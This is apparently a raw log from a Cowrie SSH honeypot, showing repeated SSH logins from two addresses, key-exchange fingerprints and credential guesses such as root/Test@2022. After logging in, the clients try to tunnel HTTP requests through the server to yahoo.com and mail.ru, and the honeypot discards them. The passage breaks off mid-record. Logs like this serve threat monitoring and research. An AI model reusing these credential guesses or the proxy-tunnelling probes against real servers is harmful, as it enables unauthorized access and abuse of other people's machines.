{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.785646Z","src_ip":"212.227.235.229","session":"b19fa38f8a97"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.826311Z","src_ip":"77.83.207.83","session":"54864641f5fd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.877236Z","src_ip":"77.83.207.83","session":"54864641f5fd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54978,"dst_ip":"1.2.3.4","dst_port":22,"session":"a758bdceb4c8","protocol":"ssh","message":"New connection: 77.83.207.83:54978 (1.2.3.4:22) [session: a758bdceb4c8]","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.927256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.927976Z","src_ip":"77.83.207.83","session":"a758bdceb4c8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.978900Z","src_ip":"77.83.207.83","session":"a758bdceb4c8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:23.231617Z","src_ip":"77.83.207.83","session":"a758bdceb4c8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27160,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:27160","sensor":"my-vps","timestamp":"2025-08-31T03:46:23.283178Z","session":"a758bdceb4c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:23.333884Z","src_ip":"77.83.207.83","session":"a758bdceb4c8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":23923,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:23923","sensor":"my-vps","timestamp":"2025-08-31T03:46:23.477965Z","session":"a758bdceb4c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:23.528768Z","src_ip":"77.83.207.83","session":"a758bdceb4c8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":24274,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:24274","sensor":"my-vps","timestamp":"2025-08-31T03:46:23.673017Z","session":"a758bdceb4c8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:23.723965Z","src_ip":"77.83.207.83","session":"a758bdceb4c8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:23.775123Z","src_ip":"77.83.207.83","session":"a758bdceb4c8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":55058,"dst_ip":"1.2.3.4","dst_port":22,"session":"28bc2f77ed65","protocol":"ssh","message":"New connection: 77.83.207.83:55058 (1.2.3.4:22) [session: 28bc2f77ed65]","sensor":"my-vps","timestamp":"2025-08-31T03:46:23.824822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:23.825686Z","src_ip":"77.83.207.83","session":"28bc2f77ed65"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:23.875961Z","src_ip":"77.83.207.83","session":"28bc2f77ed65"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:24.127447Z","src_ip":"77.83.207.83","session":"28bc2f77ed65"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":14388,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:14388","sensor":"my-vps","timestamp":"2025-08-31T03:46:24.178973Z","session":"28bc2f77ed65"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:24.229717Z","src_ip":"77.83.207.83","session":"28bc2f77ed65"}
{"eventid":"cowrie.login.failed","username":"jiaruonan","password":"ia623699","message":"login attempt [jiaruonan/ia623699] failed","sensor":"my-vps","timestamp":"2025-08-31T03:46:24.318172Z","src_ip":"212.227.235.229","session":"b19fa38f8a97"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":22191,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:22191","sensor":"my-vps","timestamp":"2025-08-31T03:46:24.372776Z","session":"28bc2f77ed65"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:24.423378Z","src_ip":"77.83.207.83","session":"28bc2f77ed65"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":7085,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:7085","sensor":"my-vps","timestamp":"2025-08-31T03:46:24.565022Z","session":"28bc2f77ed65"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:24.615666Z","src_ip":"77.83.207.83","session":"28bc2f77ed65"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:24.666912Z","src_ip":"77.83.207.83","session":"28bc2f77ed65"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":55151,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba1da4b24e38","protocol":"ssh","message":"New connection: 77.83.207.83:55151 (1.2.3.4:22) [session: ba1da4b24e38]","sensor":"my-vps","timestamp":"2025-08-31T03:46:24.716087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:24.716810Z","src_ip":"77.83.207.83","session":"ba1da4b24e38"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:24.767427Z","src_ip":"77.83.207.83","session":"ba1da4b24e38"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.018869Z","src_ip":"77.83.207.83","session":"ba1da4b24e38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":32080,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:32080","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.070414Z","session":"ba1da4b24e38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.121066Z","src_ip":"77.83.207.83","session":"ba1da4b24e38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":5798,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:5798","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.264732Z","session":"ba1da4b24e38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.315279Z","src_ip":"77.83.207.83","session":"ba1da4b24e38"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":3800,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:3800","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.456856Z","session":"ba1da4b24e38"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.507315Z","src_ip":"77.83.207.83","session":"ba1da4b24e38"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.558964Z","src_ip":"77.83.207.83","session":"ba1da4b24e38"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":55231,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6030b308b9a","protocol":"ssh","message":"New connection: 77.83.207.83:55231 (1.2.3.4:22) [session: d6030b308b9a]","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.607391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.617320Z","src_ip":"77.83.207.83","session":"d6030b308b9a"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.628713Z","src_ip":"212.227.235.229","session":"b19fa38f8a97"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.657233Z","src_ip":"77.83.207.83","session":"d6030b308b9a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.904190Z","src_ip":"77.83.207.83","session":"d6030b308b9a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13946,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13946","sensor":"my-vps","timestamp":"2025-08-31T03:46:25.954601Z","session":"d6030b308b9a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.005646Z","src_ip":"77.83.207.83","session":"d6030b308b9a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":29857,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:29857","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.147948Z","session":"d6030b308b9a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.197685Z","src_ip":"77.83.207.83","session":"d6030b308b9a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":10606,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10606","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.339922Z","session":"d6030b308b9a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.389755Z","src_ip":"77.83.207.83","session":"d6030b308b9a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.440501Z","src_ip":"77.83.207.83","session":"d6030b308b9a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":55304,"dst_ip":"1.2.3.4","dst_port":22,"session":"81e5651b8f67","protocol":"ssh","message":"New connection: 77.83.207.83:55304 (1.2.3.4:22) [session: 81e5651b8f67]","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.490299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:26.490975Z","src_ip":"77.83.207.83","session":"81e5651b8f67"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-ni